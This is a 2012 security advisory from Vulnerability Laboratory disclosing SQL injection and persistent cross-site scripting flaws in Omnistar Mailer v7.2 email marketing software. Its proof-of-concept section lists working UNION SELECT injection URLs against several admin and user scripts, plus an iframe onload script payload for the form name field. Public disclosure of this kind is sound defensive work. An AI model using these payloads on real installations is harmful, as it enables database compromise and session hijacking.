Title:
======
Omnistar Mailer v7.2  - Multiple Web Vulnerabilities

Date:
=====
2012-10-01


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=711


VL-ID:
=====
711


Common Vulnerability Scoring System:
====================================
8.5


Introduction:
=============
The Omnistar Mailer software was developed because of the need that was found 
in the industry to easily manage 
email marketing campaigns without having much technical experience. After 
reviewing feedback from various users 
that had used email mailing list managers, it was determined that many of the 
current solutions that are on the 
market are cumbersome and overly complex. Most users of email marketing 
solutions desire a simple solution were 
they can easily add email list campaigns and track the success of them. There 
of course are many other features 
that add value to the products, however the main function is to send out mass 
emails, manage the opt-in / 
opt-out process. After reviewing the feedback of these users and studying the 
current solutions on the market, 
we developed what we call Omnistar Mailer. We feel our product combines 
simplicity with a robust set of features 
and functions that should meet the needs of most users.

The Omnistar Mailer software is one of the flag ship solutions from Omnistar 
Interactive. Our entire goal when 
developing any of our solutions has been to make it so easy to use, that any 
non-technical person can successfully 
use the software. Everyday we strive to make more and more improvements to the 
software so that it becomes better 
and better. To make this goal a reality, we actively solicit feedback from our 
customers so that we stay on the 
pulse of their needs. It is only through this interactive dialogue that we can 
implement those features that make 
sense to our customers. It is our customers that drive our development process 
and make sure that our software has 
the most desired components and features.

(Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software.


Report-Timeline:
================
2012-10-01:     Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Omnistar Interactive
Product: Omnistar Mailer v7.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 
Email Marketing Software.
The vulnerabilities allow an attacker (remote) or local low privileged user 
account to execute a SQL commands on the 
affected application dbms. The vulnerabilities are located in the responder, 
preview, pages, navlinks, contacts, 
register and index modules with the bound vulnerable id & form_id parameters. 
Successful exploitation of the vulnerability 
results in dbms & application compromise. Exploitation requires no user inter 
action & without privileged user account.


Vulnerable Module(s):
                        [+] /admin/responder
                        [+] /admin/preview
                        [+] /admin/navlinks
                        [+] /admin/pages
                        [+] /admin/contacts
                        [+] /users/index
                        [+] /users/register

Vulnerable File(s):
                        [+] /admin/responder.php
                        [+] /admin/preview.php
                        [+] /admin/pages.php
                        [+] /admin/navlinks.php
                        [+] /admin/contacts.php
                        [+] /user/register.php
                        [+] /users/index.php

Vulnerable Parameter(s):
                        [+] ?op=edit&id=
                        [+] ?id=
                        [+] ?form_id=
                        [+] ?op=edit&nav_id=
                        [+] ?op=edit&id=16&form_id=
                        [+] ?op=edit&id=3&form_id=

                        [+] ?nav_id=
                        [+] ?profile=1&form_id=
                        [+] ?form_id=


1.2
A persistent input validation vulnerability is detected in the Omnistar Mailer 
v7.2 Email Marketing Software.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 
The persistent vulnerability is located in the Create Website Forms module with 
the bound vulnerable form name parameters.
Successful exploitation of the vulnerability can lead to session hijacking 
(manager/admin) or stable (persistent) context manipulation. 
Exploitation requires low user inter action & privileged user account.

Vulnerable Section(s):
                        [+] Customise Interface -> Create Website Forms

Vulnerable Module(s):
                        [+] Create Standard Registration Form -> Add form 

Vulnerable Parameter(s):
                        [+] Form Name


Proof of Concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without 
user inter action. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#

http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''9''' at line 3)
in (
select 
navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
            from mailer75_navlinks
            where nav_id='9''
)



1.2
The persistent input validation vulnerability can be exploited by remote 
attackers with low required user inter action & low 
privileged user account. For demonstration or reproduce ...

The attacker create a form and insert in "form name" field own malicious 
javascript or html code.
To create the form the attacker should to go to 
Customise Interface -> Create Website Forms -> Create Standard Registration 
Form -> Add form 
Then inject the malicious script code i.e., <iframe src=www.vuln-lab.com 
onload=alert("VL")/>
When the user browses the forms page in the control panel, or any user trying 
to register for the website, 
the persistent injected script code will be executed out of the web application 
context.


Risk:
=====
1.1
The security risk of the  blind SQL injection  vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).



Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.vulnerability-lab.com/register
Contact:    ad...@vulnerability-lab.com         - supp...@vulnerability-lab.com 
               - resea...@vulnerability-lab.com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com   
               - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

                                        Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com


Reply via email to